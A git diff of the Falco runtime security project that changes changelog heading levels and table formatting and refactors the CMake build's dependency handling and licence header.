-## Bug Fixes
+### Bug Fixes

 * Fix a problem that would cause prevent container metadata lookups when falco was daemonized [[#731](https://github.com/falcosecurity/falco/pull/731)]

 * Allow rule priorites to be expressed as lowercase and a mix of lower/uppercase [[#737](https://github.com/falcosecurity/falco/pull/737)]

-## Rule Changes
+### Rule Changes

 * Fix a parentheses bug with the `shell_procs` macro [[#728](https://github.com/falcosecurity/falco/pull/728)]

@@ -36,7 +443,7 @@ Released 2019-07-31

 Released 2019-07-12

-## Major Changes
+### Major Changes

 * Clean up error reporting to provide more meaningful error messages along with context when loading rules files. When run with -V, the results of the validation ("OK" or error message) are sent to standard output. [[#708](https://github.com/falcosecurity/falco/pull/708)]

@@ -46,7 +453,7 @@ Released 2019-07-12

 * Add Catch2 as a unit testing framework. This will add additional coverage on top of the regression tests using Avocado. [[#687](https://github.com/falcosecurity/falco/pull/687)]

-## Minor Changes
+### Minor Changes

 * Add SYSDIG_DIR Cmake option to specify location for sysdig source code when building falco. [[#677](https://github.com/falcosecurity/falco/pull/677)] [[#679](https://github.com/falcosecurity/falco/pull/679)] [[#702](https://github.com/falcosecurity/falco/pull/702)]

@@ -66,7 +473,7 @@ Released 2019-07-12

 * Fix PR template for kind/rule-*. [[#697](https://github.com/falcosecurity/falco/pull/697)]

-## Bug Fixes
+### Bug Fixes

 * Remove an unused cmake file. [[#700](https://github.com/falcosecurity/falco/pull/700)]

@@ -74,7 +481,7 @@ Released 2019-07-12

 * Misc k8s install docs improvements. [[#671](https://github.com/falcosecurity/falco/pull/671)]

-## Rule Changes
+### Rule Changes

 * Allow k8s.gcr.io/kube-proxy image to run privileged. [[#717](https://github.com/falcosecurity/falco/pull/717)]

@@ -104,19 +511,19 @@ Released 2019-07-12

 Released 2019-06-12

-## Major Changes
+### Major Changes

 * None.

-## Minor Changes
+### Minor Changes

 * None.

-## Bug Fixes
+### Bug Fixes

 * Fix kernel module compilation for kernels < 3.11 [[#sysdig/1436](https://github.com/draios/sysdig/pull/1436)]

-## Rule Changes
+### Rule Changes

 * None.

@@ -124,19 +531,19 @@ Released 2019-06-12

 Released 2019-06-12

-## Major Changes
+### Major Changes

 * New documentation and process handling around issues and pull requests. [[#644](https://github.com/falcosecurity/falco/pull/644)] [[#659](https://github.com/falcosecurity/falco/pull/659)] [[#664](https://github.com/falcosecurity/falco/pull/664)] [[#665](https://github.com/falcosecurity/falco/pull/665)]

-## Minor Changes
+### Minor Changes

 * None.

-## Bug Fixes
+### Bug Fixes

 * Fix compilation of eBPF programs on COS (used by GKE) [[#sysdig/1431](https://github.com/draios/sysdig/pull/1431)]

-## Rule Changes
+### Rule Changes

 * Rework exceptions lists for `Create Privileged Pod`, `Create Sensitive Mount Pod`, `Launch Sensitive Mount Container`, `Launch Privileged Container` rules to use separate specific lists rather than a single "Trusted Containers" list. [[#651](https://github.com/falcosecurity/falco/pull/651)]

@@ -144,11 +551,11 @@ Released 2019-06-12

 Released 2019-06-07

-## Major Changes
+### Major Changes

 * Drop unnecessary events at the kernel level instead of userspace, which should improve performance [[#635](https://github.com/falcosecurity/falco/pull/635)]

-## Minor Changes
+### Minor Changes

 * Add instructions for k8s audit support in >= 1.13 [[#608](https://github.com/falcosecurity/falco/pull/608)]

@@ -158,13 +565,13 @@ Released 2019-06-07

 * Better tracking of rule counts per ruleset [[#645](https://github.com/falcosecurity/falco/pull/645)]

-## Bug Fixes
+### Bug Fixes

 * Handle rule patterns that are invalid regexes [[#636](https://github.com/falcosecurity/falco/pull/636)]

 * Fix kernel module builds on newer kernels [[#646](https://github.com/falcosecurity/falco/pull/646)] [[#sysdig/1413](https://github.com/draios/sysdig/pull/1413)]

-## Rule Changes
+### Rule Changes

 * New rule `Launch Remote File Copy Tools in Container` could be used to identify exfiltration attacks [[#600](https://github.com/falcosecurity/falco/pull/600)]

@@ -190,9 +597,9 @@ Released 2019-06-07

 Released 2019-05-13

-## Major Changes
+### Major Changes

-* **Actions and alerts for dropped events**: Falco can now take actions, including sending alerts/logging messages, and/or even exiting Falco, when it detects dropped system call events. [[#561](https://github.com/falcosecurity/falco/pull/561)] [[#571](https://github.com/falcosecurity/falco/pull/571)]
+* **Actions and alerts for dropped events**: Falco can now take actions, including sending alerts/logging messages, and/or even exiting Falco, when it detects dropped system call events. Fixes CVE 2019-8339. [[#561](https://github.com/falcosecurity/falco/pull/561)] [[#571](https://github.com/falcosecurity/falco/pull/571)]

 * **Support for Containerd/CRI-O**: Falco now supports containerd/cri-o containers. [[#585](https://github.com/falcosecurity/falco/pull/585)] [[#591](https://github.com/falcosecurity/falco/pull/591)] [[#599](https://github.com/falcosecurity/falco/pull/599)] [[#sysdig/1376](https://github.com/draios/sysdig/pull/1376)] [[#sysdig/1310](https://github.com/draios/sysdig/pull/1310)] [[#sysdig/1399](https://github.com/draios/sysdig/pull/1399)]

@@ -209,7 +616,7 @@ Released 2019-05-13
 * RHEL-based falco image: Provide dockerfiles that use RHEL 7 as the base image instead of debian:unstable. [[#544](https://github.com/falcosecurity/falco/pull/544)]


-## Minor Changes
+### Minor Changes

 * ISO-8601 Timestamps: Add the ability to write timestamps in ISO-8601 w/ UTC, and use this format by default when running falco in a container [[#518](https://github.com/falcosecurity/falco/pull/518)]

@@ -223,13 +630,13 @@ Released 2019-05-13

 * Improvements to sample K8s daemonset/service/etc files [[#562](https://github.com/falcosecurity/falco/pull/562)]

-## Bug Fixes
+### Bug Fixes

 * Fix regression that broke json output [[#581](https://github.com/falcosecurity/falco/pull/581)]

 * Fix errors when building via docker from MacOS [[#582](https://github.com/falcosecurity/falco/pull/582)]

-## Rule Changes
+### Rule Changes

 * **Tag rules using Mitre Attack Framework**: Add tags for all relevant rules linking them to the [MITRE Attack Framework](https://attack.mitre.org). We have an associated [blog post](https://sysdig.com/blog/mitre-attck-framework-for-container-runtime-security-with-sysdig-falco/). [[#575](https://github.com/falcosecurity/falco/pull/575)] [[#578](https://github.com/falcosecurity/falco/pull/578)]

@@ -255,12 +662,11 @@ Released 2019-05-13

 * Add `ash` (Alpine Linux-related shell) as a shell binary [[#597](https://github.com/falcosecurity/falco/pull/597)]

-
 ## v0.14.0

 Released 2019-02-06

-## Major Changes
+### Major Changes

 * Rules versioning support: The falco engine and executable now have an *engine version* that represents the fields they support. Similarly, rules files have an optional *required_engine_version: NNN* object that names the minimum engine version required to read that rules file. Any time the engine adds new fields, event sources, etc, the engine version will be incremented, and any time a rules file starts using new fields, event sources, etc, the required engine version will be incremented. [[#492](https://github.com/falcosecurity/falco/pull/492)]

@@ -270,7 +676,7 @@ Released 2019-02-06

 * Support bundle: When run with `--support`, falco will print a json object containing necessary information like falco version, command line, operating system information, and falco rules files contents. This could be useful when reporting issues. [[#517](https://github.com/falcosecurity/falco/pull/517)]

-## Minor Changes
+### Minor Changes

 * Support new third-party library dependencies from open source sysdig. [[#498](https://github.com/falcosecurity/falco/pull/498)]

@@ -286,11 +692,11 @@ Released 2019-02-06

 * Add additional RBAC permissions to track deployments/daemonsets/replicasets. [[#514](https://github.com/falcosecurity/falco/pull/514)]

-## Bug Fixes
+### Bug Fixes

 * Fix formatting of nodejs examples README [[#502](https://github.com/falcosecurity/falco/pull/502)]

-## Rule Changes
+### Rule Changes

 * Remove FPs for `Launch Sensitive Mount Container` rule [[#509](https://github.com/falcosecurity/falco/pull/509/files)]

@@ -300,10 +706,10 @@ Released 2019-02-06

 Released 2019-01-16

-## Major Changes
+### Major Changes


-## Minor Changes
+### Minor Changes

 * Unbuffer outputs by default. This helps make output readable when used in environments like K8s. [[#494](https://github.com/falcosecurity/falco/pull/494)]

@@ -317,7 +723,7 @@ Released 2019-01-16

 * Remove kubernetes-response-engine from system:masters [[#488](https://github.com/falcosecurity/falco/pull/488)]

-## Bug Fixes
+### Bug Fixes

 * Ensure `-pc`/`-pk` only apply to syscall rules and not k8s_audit rules [[#495](https://github.com/falcosecurity/falco/pull/495)]

@@ -325,7 +731,7 @@ Released 2019-01-16

 * Fix a regression where format output options were mistakenly removed [[#485](https://github.com/falcosecurity/falco/pull/485)]

-## Rule Changes
+### Rule Changes

 * Fix FPs related to calico and writing files below etc [[#481](https://github.com/falcosecurity/falco/pull/481)]

@@ -342,25 +748,25 @@ Released 2019-01-16

 Released 2018-11-09

-## Major Changes
+### Major Changes

 * **Support for K8s Audit Events** : Falco now supports [K8s Audit Events](https://kubernetes.io/docs/tasks/debug-application-cluster/audit/#audit-backends) as a second stream of events in addition to syscalls. For full details on the feature, see the [wiki](https://github.com/falcosecurity/falco/wiki/K8s-Audit-Event-Support).

 * Transparent Config/Rule Reloading: On SIGHUP, Falco will now reload all config files/rules files and start processing new events. Allows rules changes without having to restart falco [[#457](https://github.com/falcosecurity/falco/pull/457)] [[#432](https://github.com/falcosecurity/falco/issues/432)]

-## Minor Changes
+### Minor Changes

 * The reference integration of falco into a action engine now supports aws actions like lambda, etc. [[#460](https://github.com/falcosecurity/falco/pull/460)]

 * Add netcat to falco docker images, which allows easier integration of program outputs to external servers [[#456](https://github.com/falcosecurity/falco/pull/456)] [[#433](https://github.com/falcosecurity/falco/issues/433)]

-## Bug Fixes
+### Bug Fixes

 * Links cleanup related to the draios/falco -> falcosecurity/falco move [[#447](https://github.com/falcosecurity/falco/pull/447)]

 * Properly load/unload kernel module when the falco service is started/stopped [[#459](https://github.com/falcosecurity/falco/pull/459)] [[#418](https://github.com/falcosecurity/falco/issues/418)]

-## Rule Changes
+### Rule Changes

 * Better coverage (e.g. reduced FPs) for critical stack, hids systems, ufw, cloud-init, etc. [[#445](https://github.com/falcosecurity/falco/pull/445)]

@@ -372,7 +778,7 @@ Released 2018-11-09

 Released 2018-09-11

-## Bug Fixes
+### Bug Fixes

 * Fig regression in libcurl configure script [[#416](https://github.com/draios/falco/pull/416)]

@@ -380,7 +786,7 @@ Released 2018-09-11

 Released 2018-09-11

-## Major Changes
+### Major Changes

 * Improved IPv6 Support to fully support use of IPv6 addresses in events, connections and filters [[#sysdig/1204](https://github.com/draios/sysdig/pull/1204)]

@@ -388,16 +794,16 @@ Released 2018-09-11

 * New filterchecks `user.loginuid` and `user.loginname` can be used to match the login uid, which stays consistent across sudo/su. This can be used to find the actual user running a given process [[#sysdig/1189](https://github.com/draios/sysdig/pull/1189)]

-## Minor Changes
+### Minor Changes

 * Upgrade zlib to 1.2.11, openssl to 1.0.2n, and libcurl to 7.60.0 to address software vulnerabilities [[#402](https://github.com/draios/falco/pull/402)]
 * New `endswith` operator can be used for suffix matching on strings [[#sysdig/1209](https://github.com/draios/sysdig/pull/1209)]

-## Bug Fixes
+### Bug Fixes

 * Better control of specifying location of lua source code [[#406](https://github.com/draios/falco/pull/406)]

-## Rule Changes
+### Rule Changes

 * None for this release.

@@ -405,7 +811,7 @@ Released 2018-09-11

 Released 2018-07-31

-## Bug Fixes
+### Bug Fixes

 * Fix a problem that caused the kernel module to not load on certain kernel versions [[#397](https://github.com/draios/falco/pull/397)] [[#394](https://github.com/draios/falco/issues/394)]

@@ -413,25 +819,25 @@ Released 2018-07-31

 Released 2018-07-24

-## Major Changes
+### Major Changes

 * **EBPF Support** (Beta): Falco can now read events via an ebpf program loaded into the kernel instead of the `falco-probe` kernel module. Full docs [here](https://github.com/draios/sysdig/wiki/eBPF-(beta)). [[#365](https://github.com/draios/falco/pull/365)]

-## Minor Changes
+### Minor Changes

 * Rules may now have an `skip-if-unknown-filter` property. If set to true, a rule will be skipped if its condition/output property refers to a filtercheck (e.g. `fd.some-new-attibute`) that is not present in the current falco version. [[#364](https://github.com/draios/falco/pull/364)] [[#345](https://github.com/draios/falco/issues/345)]
 * Small changes to Falco `COPYING` file so github automatically recognizes license [[#380](https://github.com/draios/falco/pull/380)]
 * New example integration showing how to connect Falco with Anchore to dynamically create falco rules based on negative scan results [[#390](https://github.com/draios/falco/pull/390)]
 * New example integration showing how to connect Falco, [nats](https://nats.io/), and K8s to run flexible "playbooks" based on Falco events [[#389](https://github.com/draios/falco/pull/389)]

-## Bug Fixes
+### Bug Fixes

 * Ensure all rules are enabled by default [[#379](https://github.com/draios/falco/pull/379)]
 * Fix libcurl compilation problems [[#374](https://github.com/draios/falco/pull/374)]
 * Add gcc-6 to docker container, which improves compatibility when building kernel module [[#382](https://github.com/draios/falco/pull/382)] [[#371](https://github.com/draios/falco/issues/371)]
 * Ensure the /lib/modules symlink to /host/lib/modules is set correctly [[#392](https://github.com/draios/falco/issues/392)]

-## Rule Changes
+### Rule Changes

 * Add additional binary writing programs [[#366](https://github.com/draios/falco/pull/366)]
 * Add additional package management programs [[#388](https://github.com/draios/falco/pull/388)] [[#366](https://github.com/draios/falco/pull/366)]
@@ -452,7 +858,7 @@ Released 2018-07-24

 Released 2018-04-24

-## Major Changes
+### Major Changes

 * **Rules Directory Support**: Falco will read rules files from `/etc/falco/rules.d` in addition to `/etc/falco/falco_rules.yaml` and `/etc/falco/falco_rules.local.yaml`. Also, when the argument to `-r`/falco.yaml `rules_file` is a directory, falco will read rules files from that directory. [[#348](https://github.com/draios/falco/pull/348)] [[#187](https://github.com/draios/falco/issues/187)]
 * Properly support all syscalls (e.g. those without parameter extraction by the kernel module) in falco conditions, so they can be included in `evt.type=<name>` conditions. [[#352](https://github.com/draios/falco/pull/352)]
@@ -461,7 +867,7 @@ Released 2018-04-24
 * When signaled with `USR1`, falco will close/reopen log files. Include a [logrotate](https://github.com/logrotate/logrotate) example that shows how to use this feature for log rotation. [[#347](https://github.com/draios/falco/pull/347)] [[#266](https://github.com/draios/falco/issues/266)]
 * To improve resource usage, further restrict the set of system calls available to falco [[#351](https://github.com/draios/falco/pull/351)] [[draios/sysdig#1105](https://github.com/draios/sysdig/pull/1105)]

-## Minor Changes
+### Minor Changes

 * Add gdb to the development Docker image (sysdig/falco:dev) to aid in debugging. [[#323](https://github.com/draios/falco/pull/323)]
 * You can now specify -V multiple times on the command line to validate multiple rules files at once. [[#329](https://github.com/draios/falco/pull/329)]
@@ -472,7 +878,7 @@ Released 2018-04-24
 * If a rule has an attribute `warn_evttypes`, falco will not complain about `evt.type` restrictions on that rule [[#355](https://github.com/draios/falco/pull/355)]
 * When run with `-i`, print all ignored events/syscalls and exit. [[#359](https://github.com/draios/falco/pull/359)]

-## Bug Fixes
+### Bug Fixes

 * Minor bug fixes to k8s daemonset configuration. [[#325](https://github.com/draios/falco/pull/325)] [[#296](https://github.com/draios/falco/pull/296)] [[#295](https://github.com/draios/falco/pull/295)]
 * Ensure `--validate` can be used interchangeably with `-V`. [[#334](https://github.com/draios/falco/pull/334)] [[#322](https://github.com/draios/falco/issues/322)]
@@ -481,7 +887,7 @@ Released 2018-04-24
 * Make it possible to append to a skipped macro/rule without falco complaining [[#346](https://github.com/draios/falco/pull/346)] [[#305](https://github.com/draios/falco/issues/305)]
 * Ensure rule order is preserved even when rules do not contain any `evt.type` restriction. [[#354](https://github.com/draios/falco/issues/354)] [[#355](https://github.com/draios/falco/pull/355)]

-## Rule Changes
+### Rule Changes

 * Make it easier to extend the `Change thread namespace` rule via a `user_known_change_thread_namespace_binaries` list. [[#324](https://github.com/draios/falco/pull/324)]
 * Various FP fixes from users. [[#321](https://github.com/draios/falco/pull/321)] [[#326](https://github.com/draios/falco/pull/326)] [[#344](https://github.com/draios/falco/pull/344)] [[#350](https://github.com/draios/falco/pull/350)]
@@ -736,13 +1142,13 @@ All of these changes result in dramatically reduced CPU usage. Here are some com
 * Sysdig Cloud Kubernetes Demo: Starts a kubernetes environment using docker with apache and wordpress instances + synthetic workloads.
 * [Juttle-engine examples](https://github.com/juttle/juttle-engine/blob/master/examples/README.md) : Several elasticsearch, node.js, logstash, mysql, postgres, influxdb instances run under docker-compose.

-| Workload | 0.2.0 CPU Usage | 0.3.0 CPU Usage |
-|----------| --------------- | ----------------|
-| pts/apache | 24% | 7% |
-| pts/dbench | 70% | 5% |
-| Kubernetes-Demo (Running) | 6% | 2% |
-| Kubernetes-Demo (During Teardown) | 15% | 3% |
-| Juttle-examples | 3% | 1% |
+| Workload                          | 0.2.0 CPU Usage | 0.3.0 CPU Usage |
+| --------------------------------- | --------------- | --------------- |
+| pts/apache                        | 24%             | 7%              |
+| pts/dbench                        | 70%             | 5%              |
+| Kubernetes-Demo (Running)         | 6%              | 2%              |
+| Kubernetes-Demo (During Teardown) | 15%             | 3%              |
+| Juttle-examples                   | 3%              | 1%              |

 As a part of these changes, falco now prefers rule conditions that have at least one `evt.type=` operator, at the beginning of the condition, before any negative operators (i.e. `not` or `!=`). If a condition does not have any `evt.type=` operator, falco will log a warning like:

--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -1,59 +1,66 @@
 #
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
+# Copyright (C) 2019 The Falco Authors.
 #
-# This file is part of falco .
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
 #
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
+# http://www.apache.org/licenses/LICENSE-2.0
 #
-#     http://www.apache.org/licenses/LICENSE-2.0
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
 #
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-cmake_minimum_required(VERSION 3.3.2)
+cmake_minimum_required(VERSION 3.5.1)

 project(falco)

-if(NOT SYSDIG_DIR)
-  get_filename_component(SYSDIG_DIR "${PROJECT_SOURCE_DIR}/../sysdig" REALPATH)
+option(USE_BUNDLED_DEPS "Bundle hard to find dependencies into the Falco binary" OFF)
+option(BUILD_WARNINGS_AS_ERRORS "Enable building with -Wextra -Werror flags" OFF)
+
+# Elapsed time
+# set_property(GLOBAL PROPERTY RULE_LAUNCH_COMPILE "${CMAKE_COMMAND} -E time") # TODO(fntlnz, leodido): add a flag to enable this
+
+# Make flag for parallel processing
+include(ProcessorCount)
+processorcount(PROCESSOR_COUNT)
+if(NOT PROCESSOR_COUNT EQUAL 0)
+  set(PROCESSOUR_COUNT_MAKE_FLAG -j${PROCESSOR_COUNT})
 endif()

 # Custom CMake modules
 list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake/modules")
-list(APPEND CMAKE_MODULE_PATH "${SYSDIG_DIR}/cmake/modules")

-option(BUILD_WARNINGS_AS_ERRORS "Enable building with -Wextra -Werror flags")
+# GNU standard installation directories' definitions
+include(GNUInstallDirs)

 if(NOT DEFINED FALCO_ETC_DIR)
-	set(FALCO_ETC_DIR "/etc/falco")
+  set(FALCO_ETC_DIR "${CMAKE_INSTALL_FULL_SYSCONFDIR}/falco")
 endif()

 if(NOT DRAIOS_DEBUG_FLAGS)
-	set(DRAIOS_DEBUG_FLAGS "-D_DEBUG")
+  set(DRAIOS_DEBUG_FLAGS "-D_DEBUG")
 endif()

 string(TOLOWER "${CMAKE_BUILD_TYPE}" CMAKE_BUILD_TYPE)
-if (CMAKE_BUILD_TYPE STREQUAL "debug")
-	set(KBUILD_FLAGS "${DRAIOS_DEBUG_FLAGS} ${DRAIOS_FEATURE_FLAGS}")
+if(CMAKE_BUILD_TYPE STREQUAL "debug")
+  set(KBUILD_FLAGS "${DRAIOS_DEBUG_FLAGS} ${DRAIOS_FEATURE_FLAGS}")
 else()
-	set(CMAKE_BUILD_TYPE "release")
-	set(KBUILD_FLAGS "${DRAIOS_FEATURE_FLAGS}")
+  set(CMAKE_BUILD_TYPE "release")
+  set(KBUILD_FLAGS "${DRAIOS_FEATURE_FLAGS}")
 endif()
+message(STATUS "Build type: ${CMAKE_BUILD_TYPE}")

 set(CMAKE_COMMON_FLAGS "-Wall -ggdb ${DRAIOS_FEATURE_FLAGS}")

 if(BUILD_WARNINGS_AS_ERRORS)
-	set(CMAKE_SUPPRESSED_WARNINGS "-Wno-unused-parameter -Wno-unused-variable -Wno-unused-but-set-variable -Wno-missing-field-initializers -Wno-sign-compare -Wno-type-limits -Wno-implicit-fallthrough -Wno-format-truncation")
-	set(CMAKE_COMMON_FLAGS "${CMAKE_COMMON_FLAGS} -Wextra -Werror ${CMAKE_SUPPRESSED_WARNINGS}")
+  set(CMAKE_SUPPRESSED_WARNINGS
+      "-Wno-unused-parameter -Wno-unused-variable -Wno-unused-but-set-variable -Wno-missing-field-initializers -Wno-sign-compare -Wno-type-limits -Wno-implicit-fallthrough -Wno-format-truncation -Wno-stringop-truncation -Wno-stringop-overflow -Wno-restrict"
+  )
+  set(CMAKE_COMMON_FLAGS "${CMAKE_COMMON_FLAGS} -Wextra -Werror ${CMAKE_SUPPRESSED_WARNINGS}")
 endif()

 set(CMAKE_C_FLAGS "${CMAKE_COMMON_FLAGS}")
-set(CMAKE_CXX_FLAGS "--std=c++0x ${CMAKE_COMMON_FLAGS}")
+set(CMAKE_CXX_FLAGS "--std=c++0x ${CMAKE_COMMON_FLAGS} -Wno-class-memaccess")

 set(CMAKE_C_FLAGS_DEBUG "${DRAIOS_DEBUG_FLAGS}")
 set(CMAKE_CXX_FLAGS_DEBUG "${DRAIOS_DEBUG_FLAGS}")
@@ -61,614 +68,191 @@ set(CMAKE_CXX_FLAGS_DEBUG "${DRAIOS_DEBUG_FLAGS}")
 set(CMAKE_C_FLAGS_RELEASE "-O3 -fno-strict-aliasing -DNDEBUG")
 set(CMAKE_CXX_FLAGS_RELEASE "-O3 -fno-strict-aliasing -DNDEBUG")

-add_definitions(-DPLATFORM_NAME="${CMAKE_SYSTEM_NAME}")
-add_definitions(-DK8S_DISABLE_THREAD)
-if(CMAKE_SYSTEM_NAME MATCHES "Linux")
-	add_definitions(-DHAS_CAPTURE)
-endif()
-
-# Create the falco version variable according to git index
-if(NOT FALCO_VERSION)
-  include(GetGitRevisionDescription)
-  git_get_exact_tag(FALCO_TAG)
-  if(NOT FALCO_TAG)
-    git_describe(FALCO_VERSION "--always")
-    git_local_changes(FALCO_CHANGES)
-    if(FALCO_CHANGES STREQUAL "DIRTY")
-      string(TOLOWER "${FALCO_CHANGES}" FALCO_CHANGES)
-      set(FALCO_VERSION "${FALCO_VERSION}.${FALCO_CHANGES}")
-    endif()
-    set(FALCO_VERSION "0.${FALCO_VERSION}")
-  else()
-    set(FALCO_VERSION "${FALCO_TAG}")
-    string(REGEX
-           REPLACE "^v([0-9]+)(\\.[0-9]+)(\\.[0-9]+)?"
-                   "\\1\\2\\3"
-                   FALCO_VERSION
-                   ${FALCO_VERSION})
-  endif()
-endif()
-message(STATUS "Falco version: ${FALCO_VERSION}")
+include(GetFalcoVersion)

 set(PACKAGE_NAME "falco")
-set(PROBE_VERSION "${FALCO_VERSION}")
-set(PROBE_NAME "falco-probe")
+set(PROBE_NAME "falco")
 set(PROBE_DEVICE_NAME "falco")
-if (CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
-	set(CMAKE_INSTALL_PREFIX /usr CACHE PATH "Default install path" FORCE)
+set(DRIVERS_REPO "https://dl.bintray.com/falcosecurity/driver")
+if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
+  set(CMAKE_INSTALL_PREFIX
+      /usr
+      CACHE PATH "Default install path" FORCE)
 endif()

 set(CMD_MAKE make)

-# make luaJIT work on OS X
-if(APPLE)
-	set(CMAKE_EXE_LINKER_FLAGS "-pagezero_size 10000 -image_base 100000000")
-endif()
-
 include(ExternalProject)

-option(USE_BUNDLED_DEPS "Enable bundled dependencies instead of using the system ones" ON)
-
-#
-# zlib
-#
-option(USE_BUNDLED_ZLIB "Enable building of the bundled zlib" ${USE_BUNDLED_DEPS})
-
-if(NOT USE_BUNDLED_ZLIB)
-	find_path(ZLIB_INCLUDE zlib.h PATH_SUFFIXES zlib)
-	find_library(ZLIB_LIB NAMES z)
-	if(ZLIB_INCLUDE AND ZLIB_LIB)
-		message(STATUS "Found zlib: include: ${ZLIB_INCLUDE}, lib: ${ZLIB_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system zlib")
-	endif()
-else()
-        set(ZLIB_SRC "${PROJECT_BINARY_DIR}/zlib-prefix/src/zlib")
-        message(STATUS "Using bundled zlib in '${ZLIB_SRC}'")
-        set(ZLIB_INCLUDE "${ZLIB_SRC}")
-        set(ZLIB_LIB "${ZLIB_SRC}/libz.a")
-        ExternalProject_Add(zlib
-		# START CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, CVE-2016-9843
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.11.tar.gz"
-                URL_MD5 "1c9f62f0778697a09d36121ead88e08e"
-		# END CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, CVE-2016-9843
-		CONFIGURE_COMMAND "./configure"
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		INSTALL_COMMAND "")
-endif()
-
-#
 # jq
-#
-option(USE_BUNDLED_JQ "Enable building of the bundled jq" ${USE_BUNDLED_DEPS})
-if(NOT USE_BUNDLED_JQ)
-	find_path(JQ_INCLUDE jq.h PATH_SUFFIXES jq)
-	find_library(JQ_LIB NAMES jq)
-	if(JQ_INCLUDE AND JQ_LIB)
-		message(STATUS "Found jq: include: ${JQ_INCLUDE}, lib: ${JQ_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system jq")
-	endif()
-else()
-        set(JQ_SRC "${PROJECT_BINARY_DIR}/jq-prefix/src/jq")
-        message(STATUS "Using bundled jq in '${JQ_SRC}'")
-        set(JQ_INCLUDE "${JQ_SRC}")
-        set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
-        ExternalProject_Add(jq
-                URL "https://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
-                URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
-                CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
-                BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
-                BUILD_IN_SOURCE 1
-		PATCH_COMMAND curl -L https://github.com/stedolan/jq/commit/8eb1367ca44e772963e704a700ef72ae2e12babd.patch | patch
-                INSTALL_COMMAND "")
-endif()
+include(jq)

-set(JSONCPP_SRC "${SYSDIG_DIR}/userspace/libsinsp/third-party/jsoncpp")
-set(JSONCPP_INCLUDE "${JSONCPP_SRC}")
-set(JSONCPP_LIB_SRC "${JSONCPP_SRC}/jsoncpp.cpp")
-
-#
 # nlohmann-json
-#
-option(USE_BUNDLED_NJSON "Enable building of the bundled nlohmann-json" ${USE_BUNDLED_DEPS})
+set(NJSON_SRC "${PROJECT_BINARY_DIR}/njson-prefix/src/njson")
+message(STATUS "Using bundled nlohmann-json in '${NJSON_SRC}'")
+set(NJSON_INCLUDE "${NJSON_SRC}/single_include")
+ExternalProject_Add(
+  njson
+  URL "https://github.com/nlohmann/json/archive/v3.3.0.tar.gz"
+  URL_HASH "SHA256=2fd1d207b4669a7843296c41d3b6ac5b23d00dec48dba507ba051d14564aa801"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ""
+  INSTALL_COMMAND "")

-if(NOT USE_BUNDLED_NJSON)
-	find_path(NJSON_INCLUDE json.hpp PATH_SUFFIXES nlohmann)
-	if(NJSON_INCLUDE)
-		message(STATUS "Found nlohmann-json: include: ${NJSON_INCLUDE}")
-	else()
-		message(FATAL_ERROR "Couldn't find system nlohmann-json")
-	endif()
-else()
-	# No distinction needed for windows. The implementation is
-	# solely in json.hpp.
-	set(NJSON_SRC "${PROJECT_BINARY_DIR}/njson-prefix/src/njson")
-	message(STATUS "Using bundled nlohmann-json in '${NJSON_SRC}'")
-	set(NJSON_INCLUDE "${NJSON_SRC}/single_include")
-	ExternalProject_Add(njson
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/njson-3.3.0.tar.gz"
-		URL_MD5 "e26760e848656a5da400662e6c5d999a"
-		CONFIGURE_COMMAND ""
-		BUILD_COMMAND ""
-		INSTALL_COMMAND "")
-endif()
-
-#
 # curses
-#
-# we pull this in because libsinsp won't build without it
+# We pull this in because libsinsp won't build without it
+set(CURSES_NEED_NCURSES TRUE)
+find_package(Curses REQUIRED)
+message(STATUS "Found ncurses: include: ${CURSES_INCLUDE_DIR}, lib: ${CURSES_LIBRARIES}")

-option(USE_BUNDLED_NCURSES "Enable building of the bundled ncurses" ${USE_BUNDLED_DEPS})
-
-if(NOT USE_BUNDLED_NCURSES)
-	set(CURSES_NEED_NCURSES TRUE)
-	find_package(Curses REQUIRED)
-	message(STATUS "Found ncurses: include: ${CURSES_INCLUDE_DIR}, lib: ${CURSES_LIBRARIES}")
-else()
-	set(CURSES_BUNDLE_DIR "${PROJECT_BINARY_DIR}/ncurses-prefix/src/ncurses")
-	set(CURSES_INCLUDE_DIR "${CURSES_BUNDLE_DIR}/include/")
-	set(CURSES_LIBRARIES "${CURSES_BUNDLE_DIR}/lib/libncurses.a")
-	message(STATUS "Using bundled ncurses in '${CURSES_BUNDLE_DIR}'")
-	ExternalProject_Add(ncurses
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
-		URL_MD5 "32b8913312e738d707ae68da439ca1f4"
-		CONFIGURE_COMMAND ./configure --without-cxx --without-cxx-binding --without-ada --without-manpages --without-progs --without-tests --with-terminfo-dirs=/etc/terminfo:/lib/terminfo:/usr/share/terminfo
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		INSTALL_COMMAND "")
-endif()
-
-#
 # libb64
